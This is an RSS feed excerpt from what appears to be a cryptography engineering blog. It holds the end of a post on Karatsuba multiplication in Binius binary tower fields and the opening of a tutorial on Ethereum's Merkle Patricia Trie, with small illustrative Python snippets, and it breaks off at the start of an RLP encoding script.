c &amp;amp; d&lt;br &#x2F;&gt;
\end{array}&lt;br &#x2F;&gt;
\right)$$&lt;&#x2F;p&gt;
&lt;p&gt;We’ll compute $P_C$ by going one level down in the recursion, expressing its coordinates over $\mathcal{T_2}$ as coordinates over $\mathcal{T_0}$, just as before:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $P^\prime_A = a\cdot c$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 1}\times \boxed{1, 1} = \boxed{1,0}$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $P^\prime_B = b\cdot d$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{1, 0}\times \boxed{1, 0} = \boxed{1,0}$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $P^\prime_C = (a + b)\cdot(c + d)$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{1, 1}\times \boxed{0, 1}=\boxed{1,0}$$ (once done the necessary addition in each factor)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. And finally we have the $P^\prime_B X_{0}$ term:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$\boxed{1,0}\times\boxed{0,1} = \boxed{0,1}$$&lt;&#x2F;p&gt;
&lt;p&gt;With all these, we’re ready to reconstruct $P_C$ as an element in $\mathcal{T_2}$. The coordinate expression for&lt;&#x2F;p&gt;
&lt;p&gt;$$P_C = (P^\prime_A + P^\prime_B) + (M + P^\prime_B X_0 )X_1$$&lt;&#x2F;p&gt;
&lt;p&gt;can be reconstructed from the 2-bit strings as follows: &lt;strong&gt;first add, then pad&lt;&#x2F;strong&gt;. Since we already did this a couple of times, we allow ourselves to move a bit faster:&lt;&#x2F;p&gt;
&lt;p&gt;$$[P^\prime_A + P^\prime_B ]^2 = \boxed{1,0,0,0} + \boxed{1,0,0,0} = \boxed{0,0,0,0}$$&lt;&#x2F;p&gt;
&lt;p&gt;Then, the slippery part: viewed as elements in $\mathcal{T_1}$,&lt;&#x2F;p&gt;
&lt;p&gt;$$P^\prime_B X_0 = \boxed{0,1}\implies M + P^\prime_B X_0 = \boxed{1,0} + \boxed{0,1} = \boxed{1,1}$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Before multiplying it with $X_1$, we embed this element in $\mathcal{T_2}$ by padding with zeros at the end.&lt;&#x2F;strong&gt; We now perform the product in the upper extension by simply shifting its coefficients two positions toward the higher-index slots, filling the first two slots with zeros:&lt;&#x2F;p&gt;
&lt;p&gt;$$[M + P^\prime_B X_0 ]^2=\boxed{1,1,0,0},\quad\text{then }\quad [(M + P^\prime_B X_0 )X_1 ]^2 = \boxed{0,0,1,1}$$&lt;&#x2F;p&gt;
&lt;p&gt;We obtain $[P_C ]^2=\boxed{0,0,1,1}$, this is, $P_C = X_1 + X_0 X_1 \in\mathcal{T_2}$&lt;&#x2F;p&gt;
&lt;p&gt;The last branch of this first layer amounts to computing $P_B X_1$; this product takes place in the subfield $\mathcal{T_2}$. Applying the multiplication-by-$X_1$ matrix to $[P_B ]^2 = \boxed{0,0,0,1}$ gives&lt;&#x2F;p&gt;
&lt;p&gt;$$[P_B X_1 ]^2 = \boxed{0,1,1,1}$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Second step:** Reconstruct by performing additions&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We’re now ready to build $u\cdot v$ with Karatsuba’s recipe:&lt;&#x2F;p&gt;
&lt;p&gt;$$u\cdot v = (P_A + P_B ) +(M + P_B X_1 ) X_2$$&lt;&#x2F;p&gt;
&lt;p&gt;Let’s proceed in coordinates. Before anything else, let’s begin by displaying all the elements we need to combine so we don’t mess up.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $P_A = X_0 + X_0 X_1 \in\mathcal{T_2} \iff [P_A ]^2 = \boxed{0,1,0,1}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $P_B = X_0 X_1 \in\mathcal{T_2} \iff [P_B ]^2 = \boxed{0,0,0,1}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $P_C = X_1 + X_0 X_1 \in\mathcal{T_2} \iff [P_C ]^2 = \boxed{0,0,1,1}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. $M = P_A + P_B + P_C = X_0 + X_1 + X_0 X_1 \in\mathcal{T_2} \iff [M]^2 = \boxed{0,1,1,1}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. $P_B X_1 = X_0 + X_1 + X_0 X_1 \in\mathcal{T_2} \iff [P_B X_1 ]^2 = \boxed{0,1,1,1}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To do this, we add these elements in $\mathcal{T_2}$ and then embed them in $\mathcal{T_3}$ by padding their last 4 positions with zeros to obtain 8-bit strings. This gives&lt;&#x2F;p&gt;
&lt;p&gt;$$[P_A + P_B]^3 = \boxed{0,1,0,0,0,0,0,0}$$&lt;&#x2F;p&gt;
&lt;p&gt;which is the first piece we need. Next, we compute $M + P_B X_1$ in $\mathcal{T_3}$:&lt;&#x2F;p&gt;
&lt;p&gt;$$[M + P_B X_1 ]^2 = \boxed{0,0,0,0}\implies [M + P_B X_1 ]^3 = \boxed{0,0,0,0,0,0,0,0}$$&lt;&#x2F;p&gt;
&lt;p&gt;so trivially&lt;&#x2F;p&gt;
&lt;p&gt;$$[(M + P_B X_1 )X_2 ]^3 = \boxed{0,0,0,0,0,0,0,0}$$&lt;&#x2F;p&gt;
&lt;p&gt;The desired product is then&lt;&#x2F;p&gt;
&lt;p&gt;$$[u\cdot v]^3 = \boxed{0,1,0,0,0,0,0,0} + \boxed{0,0,0,0,0,0,0,0} = \boxed{0,1,0,0,0,0,0,0}$$&lt;&#x2F;p&gt;
&lt;p&gt;that is, $u\cdot v = X_0$, which can be verified directly by hand.&lt;&#x2F;p&gt;
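&lt;p&gt;For the skeptical reader, the whole hand computation can be cross-checked with a short recursive multiplier that follows exactly the recipe above (our own sketch under the bit-encoding used in this example, not a reference implementation):&lt;&#x2F;p&gt;

```python
def mulx(e, j):
    # Multiply e in T_j by X_{j-1}; for j = 0 this is multiplication by 1.
    if j == 0:
        return e
    n = 1 << (j - 1)
    e0, e1 = e & ((1 << n) - 1), e >> n
    return e1 | ((e0 ^ mulx(e1, j - 1)) << n)

def mul(a, b, k):
    # Karatsuba multiplication in T_k; elements are integers whose
    # 2**k bits are their multilinear coordinates.
    if k == 0:
        return a & b                      # T_0 = F_2
    n = 1 << (k - 1)
    mask = (1 << n) - 1
    a0, a1 = a & mask, a >> n             # a = a0 + a1 * X_{k-1}
    b0, b1 = b & mask, b >> n
    pa = mul(a0, b0, k - 1)
    pb = mul(a1, b1, k - 1)
    pc = mul(a0 ^ a1, b0 ^ b1, k - 1)
    m = pa ^ pb ^ pc                      # cross term a0*b1 + a1*b0
    # a*b = (pa + pb) + (m + pb * X_{k-2}) * X_{k-1}
    return (pa ^ pb) | ((m ^ mulx(pb, k - 1)) << n)

u = 0b01000010   # X_0 + X_1 X_2
v = 0b00100101   # 1 + X_1 + X_0 X_2
assert mul(u, v, 3) == 0b10   # u * v = X_0, exactly as computed by hand
```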
&lt;p&gt;Admittedly, carrying out this last example in full can quickly turn dull, but it highlights the convenient recursive nature of multiplication in binary towers, and shows that circuitry-level operations are a key ingredient for fast and efficient implementations.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we covered the basics of the tower construction powering Binius and some of its interesting properties. In an upcoming article, we raise the bar and aim for a more involved problem: polynomial evaluation in binary towers.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>An introduction to Merkle Patricia Trie</title>
          <pubDate>Mon, 09 Jun 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/an-introduction-to-merkle-patricia-trie/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/an-introduction-to-merkle-patricia-trie/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/an-introduction-to-merkle-patricia-trie/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Ethereum relies on cryptographic data structures to efficiently store and verify its state. One of these structures is the Merkle Patricia Trie (MPT), which powers Ethereum’s state management. After exploring this tool in more depth, it becomes clear that the MPT is a complex structure—far more intricate than a simple Merkle tree. That’s why we felt it was important to create this post: to make MPTs more accessible and easier to understand. Here we’ll explain what an MPT is, how Ethereum uses it and how its proofs work. In an upcoming post, we will explain how to arithmetize the MPT to be able to generate proofs for showing that we verified that elements are in the tree or that the tree has been updated successfully.&lt;&#x2F;p&gt;
&lt;p&gt;In what follows we only assume that you have a basic knowledge of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;decentralizedthoughts.github.io&#x2F;2020-12-22-what-is-a-merkle-tree&#x2F;&quot;&gt;Merkle Trees&lt;&#x2F;a&gt; and cryptographic hash functions.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;quick-merkle-tree-recap&quot;&gt;Quick Merkle Tree Recap&lt;&#x2F;h2&gt;
&lt;p&gt;A Merkle Tree is a binary tree where:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * _Leaves_ contain hashes of data.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * _Non-leaf nodes_ contain hashes of the concatenation of their child nodes.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The _root hash_ acts as a cryptographic fingerprint of all the leaves data. In other words, it&amp;#39;s a short, fixed-size summary (a hash) that uniquely identifies a large set of data — like a unique signature.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Merkle trees are used for &lt;strong&gt;data integrity proofs&lt;&#x2F;strong&gt; : you can prove efficiently that a piece of data belongs to the tree’s leaves by providing a Merkle path (a sequence of hashes from the leaf to the root).&lt;&#x2F;p&gt;
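&lt;p&gt;To make the idea concrete, here is a minimal sketch of building a root and checking a Merkle path. It uses SHA-256 and duplicates the last node on odd levels — one common convention, not Ethereum’s actual scheme:&lt;&#x2F;p&gt;

```python
import hashlib

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def merkle_root(leaves):
    """Fold leaf hashes pairwise up to a single root."""
    level = [h(leaf) for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])   # duplicate the last node on odd levels
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]

def merkle_proof(leaves, index):
    """Merkle path: the sibling hash at every level, with its side."""
    level = [h(leaf) for leaf in leaves]
    proof = []
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])
        sibling = index ^ 1
        proof.append((level[sibling], sibling < index))  # (hash, sibling is left?)
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        index //= 2
    return proof

def verify(leaf, proof, root):
    """Recompute the root from the leaf and its Merkle path."""
    acc = h(leaf)
    for sibling, is_left in proof:
        acc = h(sibling + acc) if is_left else h(acc + sibling)
    return acc == root
```

&lt;p&gt;Ethereum’s tries use Keccak-256 and a trie shape rather than a plain binary tree, but the verification idea — recompute the root from a leaf and its sibling hashes — is the same.&lt;&#x2F;p&gt;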
&lt;h2 id=&quot;what-is-a-trie&quot;&gt;What is a trie?&lt;&#x2F;h2&gt;
&lt;p&gt;A Trie (short for retrieval tree, also known as a prefix tree) is a tree-like data structure used to efficiently store and retrieve key-value pairs, especially when the keys are strings or sequences.&lt;&#x2F;p&gt;
&lt;p&gt;Each level of the trie represents a character in the key, and the path from the root to a leaf corresponds to an entire key. Shared prefixes between keys are stored only once, making tries very space-efficient for datasets with common prefixes.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s see a toy example to make it easier to understand. Let’s say we want to store these key-value pairs:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Key&lt;&#x2F;th&gt;&lt;th&gt;Value&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;cat&lt;&#x2F;td&gt;&lt;td&gt;curious&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;cake&lt;&#x2F;td&gt;&lt;td&gt;sweet&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;cup&lt;&#x2F;td&gt;&lt;td&gt;fragile&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;cups&lt;&#x2F;td&gt;&lt;td&gt;plural&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;book&lt;&#x2F;td&gt;&lt;td&gt;heavy&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Our toy trie would look something like this:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;HyXnHtvzgl.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
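&lt;p&gt;The toy trie above can be sketched with nested dictionaries; the &lt;code&gt;&quot;_value&quot;&lt;&#x2F;code&gt; key marking the end of a key is our own illustrative convention:&lt;&#x2F;p&gt;

```python
def insert(trie, key, value):
    """Walk/create one node per character; store the value where the key ends."""
    node = trie
    for ch in key:
        node = node.setdefault(ch, {})
    node["_value"] = value   # "_value" is our own end-of-key marker

def lookup(trie, key):
    """Follow the key's characters from the root; None if the path breaks."""
    node = trie
    for ch in key:
        node = node.get(ch)
        if node is None:
            return None
    return node.get("_value")

trie = {}
pairs = [("cat", "curious"), ("cake", "sweet"), ("cup", "fragile"),
         ("cups", "plural"), ("book", "heavy")]
for k, v in pairs:
    insert(trie, k, v)

lookup(trie, "cake")   # follows c -> a -> k -> e and finds "sweet"
```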
&lt;p&gt;To look up the value of the key “cake”:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Start at the root.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Follow the nodes corresponding to the key&amp;#39;s characters: `c -&amp;gt; a -&amp;gt; k -&amp;gt; e`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Retrieve value &amp;quot;sweet&amp;quot; at the last node `e`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;what-is-a-merkle-patricia-trie&quot;&gt;What is a Merkle Patricia Trie?&lt;&#x2F;h2&gt;
&lt;p&gt;Ethereum uses a specialized form of trie called the Modified Merkle Patricia Trie (MPT). The name combines three core ideas:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Trie:** For organizing keys by shared prefixes.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Merkle:** Every node is hashed, forming a Merkle structure that enables cryptographic verification of the entire dataset.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Patricia:** Short for Practical Algorithm to Retrieve Information Coded in Alphanumeric — a variant of a trie that compresses paths where nodes have a single child (also called radix or compact trie).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;how-are-mpts-used-in-ethereum&quot;&gt;How are MPTs used in Ethereum?&lt;&#x2F;h2&gt;
&lt;p&gt;Ethereum uses several MPTs, but we’ll focus on just one of them, the &lt;strong&gt;State Trie&lt;&#x2F;strong&gt; , and use it as an example to explain how they work.&lt;&#x2F;p&gt;
&lt;p&gt;In the State Trie, the state of every account is stored as a key-value pair where:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The **key** is the Keccak-256 hash of the account address.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The **value** is the account, which is the [RLP](https:&#x2F;&#x2F;ethereum.org&#x2F;en&#x2F;developers&#x2F;docs&#x2F;data-structures-and-encoding&#x2F;rlp&#x2F;) encoding of a four item array: `[nonce, balance, storageRoot, codeHash]`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To reach consensus, when a new block appears with a transaction set, every Ethereum node would need to execute all those transactions and verify that the resulting state is the same for all the nodes. However, comparing every account would be computationally very expensive, so instead they use an MPT. The states of all the accounts of Ethereum are stored in a single Merkle trie called &lt;strong&gt;State Trie&lt;&#x2F;strong&gt; that is constantly updated after each transaction execution. To reach consensus, the nodes just compare the &lt;strong&gt;StateRoot&lt;&#x2F;strong&gt; (the root of the State Trie). If two nodes have the same StateRoot, their states match.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;immutability-the-big-mpt-s-advantage&quot;&gt;Immutability: The big MPT’s advantage&lt;&#x2F;h2&gt;
&lt;p&gt;Ethereum needs to be able to revert easily to previous states: when nodes disagree on the next block, a blockchain fork is necessary. This is possible because tries keep the old state around, instead of deleting or modifying it directly. The trie is persistent and versionable, rather than a mutable in-place structure.&lt;&#x2F;p&gt;
&lt;p&gt;When the state changes (e.g., an account balance updates), the trie creates new nodes for the changed paths, while the rest of the trie (the unchanged parts) are reused. Therefore, previous versions of the trie are still accessible via their root. Every block stores a state root in its header and this root uniquely identifies the entire Ethereum state at that point in time. So, if Ethereum needs to rollback, it just uses the state root of a previous block. Since the old nodes were never deleted, the trie can rebuild the old state efficiently. This means Ethereum can restore the old state just by switching back to an earlier root hash.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;mpt-structure&quot;&gt;MPT Structure&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s explain how the State Trie is built. As we said above the keys of this trie consist of the hashes of the addresses, represented as a hexadecimal string. As we showed in the toy example, each node of the trie will store a character of the hex string, that is, a single &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Nibble&quot;&gt;nibble&lt;&#x2F;a&gt; (four bits of data).&lt;&#x2F;p&gt;
&lt;p&gt;There are three types of nodes in an MPT:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. **Branch Node**&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * It stores a 17-item array.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * The first 16 items represent one of each hexadecimal digit the key prefix can be. If the key prefix is the digit $i$, then at index $i$ you&amp;#39;ll find the pointer to the next node that continues the key&amp;#39;s path.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * The last item can allocate a value in the case a key ends there.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * Example:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;code&gt;[0x, 0x, child_hash, 0x, 0x, other_child_hash, 0x, 0x, 0x, 0x, 0x, 0x, 0x, 0x, 0x, 0x, value]&lt;&#x2F;code&gt;&lt;br &#x2F;&gt;
Here, &lt;code&gt;&quot;0x&quot;&lt;&#x2F;code&gt; represents the unused slots, i.e. digits that don’t have children.
2. &lt;strong&gt;Extension Node&lt;&#x2F;strong&gt;
* It’s the result of an optimization that compresses shared key prefixes.
* It stores a two-item array that contains the shared key prefix and a pointer to the next node.
* Example: &lt;code&gt;[shared_prefix, child_hash]&lt;&#x2F;code&gt;
3. &lt;strong&gt;Leaf Node&lt;&#x2F;strong&gt;
* It stores a two-item array with the remaining key fragment and its associated value, ending the path.
* Example: &lt;code&gt;[key_remaining, value]&lt;&#x2F;code&gt;&lt;&#x2F;p&gt;
&lt;p&gt;All three node types store a single array encoded in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ethereum.org&#x2F;en&#x2F;developers&#x2F;docs&#x2F;data-structures-and-encoding&#x2F;rlp&#x2F;&quot;&gt;RLP&lt;&#x2F;a&gt;. The pointer to a node is always the hash of the RLP-encoded data it stores. The root can be of any type, but usually, since we have a lot of data, the root is a branch node.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;node-and-parity-flags&quot;&gt;Node and parity flags&lt;&#x2F;h3&gt;
&lt;p&gt;When traversing a key path nibble by nibble (or character by character), we may end up with a leaf or extension node that has an odd number of nibbles to store. But since all data is stored in bytes, this creates a problem. For instance, if we wanted to store the nibble &lt;code&gt;1&lt;&#x2F;code&gt;, we would have to save it as &lt;code&gt;01&lt;&#x2F;code&gt;, but we wouldn’t be able to tell whether it came from the two nibbles &lt;code&gt;01&lt;&#x2F;code&gt;, or from a single nibble &lt;code&gt;1&lt;&#x2F;code&gt;. To indicate whether we are storing an even or odd number of nibbles — and what type of node we are dealing with (leaf or extension) — the partial path is prefixed with the following flags.&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;flag&lt;&#x2F;th&gt;&lt;th&gt;node type&lt;&#x2F;th&gt;&lt;th&gt;path length parity&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;00&lt;&#x2F;td&gt;&lt;td&gt;Extension&lt;&#x2F;td&gt;&lt;td&gt;Even&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;Extension&lt;&#x2F;td&gt;&lt;td&gt;Odd&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;Leaf&lt;&#x2F;td&gt;&lt;td&gt;Even&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;Leaf&lt;&#x2F;td&gt;&lt;td&gt;Odd&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
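&lt;p&gt;As a small sketch of the table above (our own illustrative helper, not client code; the name &lt;code&gt;hp_encode&lt;&#x2F;code&gt; is made up):&lt;&#x2F;p&gt;

```python
def hp_encode(nibbles, is_leaf):
    """Hex-prefix encode a nibble path: the flag nibble records the node type
    (leaf or extension) and whether the path length is odd or even."""
    flag = 2 if is_leaf else 0
    if len(nibbles) % 2 == 1:
        prefixed = [flag + 1] + list(nibbles)   # odd: flag shares a byte with the path
    else:
        prefixed = [flag, 0] + list(nibbles)    # even: pad the flag with a 0 nibble
    # pack pairs of nibbles into bytes
    return bytes(prefixed[i] * 16 + prefixed[i + 1]
                 for i in range(0, len(prefixed), 2))
```

&lt;p&gt;For instance, the nibbles of the key &lt;code&gt;616b6c64&lt;&#x2F;code&gt; encoded as a leaf with an even-length path give &lt;code&gt;20616b6c64&lt;&#x2F;code&gt;, the prefixed key used in the example below.&lt;&#x2F;p&gt;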
&lt;h2 id=&quot;example-building-an-mpt-step-by-step&quot;&gt;Example: Building an MPT step by step&lt;&#x2F;h2&gt;
&lt;p&gt;The best way to understand an MPT is to walk through a full example. Let’s simulate a real State Trie. Say we have data for five accounts that translate into the following key-value pairs:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;&#x2F;th&gt;&lt;th&gt;Keys&lt;&#x2F;th&gt;&lt;th&gt;Values&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0x616b6c64&lt;&#x2F;td&gt;&lt;td&gt;0x01&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;0x616b6c65&lt;&#x2F;td&gt;&lt;td&gt;0x02&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;0x616b6c78&lt;&#x2F;td&gt;&lt;td&gt;0x03&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;0x616b6d31&lt;&#x2F;td&gt;&lt;td&gt;0x04&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;0x31323334&lt;&#x2F;td&gt;&lt;td&gt;0x05&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;As we mentioned earlier, the keys should be the hashes of the account addresses. Since Ethereum uses Keccak-256, the keys should be 32 bytes long (or 64 hexadecimal characters). However, for this example, we’ll use much shorter keys so that the resulting trie isn’t too large and is easier to understand. Ethereum also uses optimizations, such as inlining small nodes, which we’ll skip in this example for clarity.&lt;&#x2F;p&gt;
&lt;p&gt;Now we are ready to build the MPT:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Start with an empty MPT and add the first key-value pair: `(0x616b6c64, 0x01)`. Since it is just one key, it results in a trie of only one leaf node. To create that node proceed in the following way:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Write a two-item array:** The first element should be the whole key and the second one the value. Add the prefix flag `20` to the first element indicating that the node is a leaf and that the key has an even number of nibbles. Then, the array should look like this: `[&amp;quot;0x20616b6c64&amp;quot;,&amp;quot;0x01&amp;quot;]`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Encode in RLP the array:** You can use an [RLP converter](https:&#x2F;&#x2F;toolkit.abdk.consulting&#x2F;ethereum#rlp) or this python script:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;import rlp&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
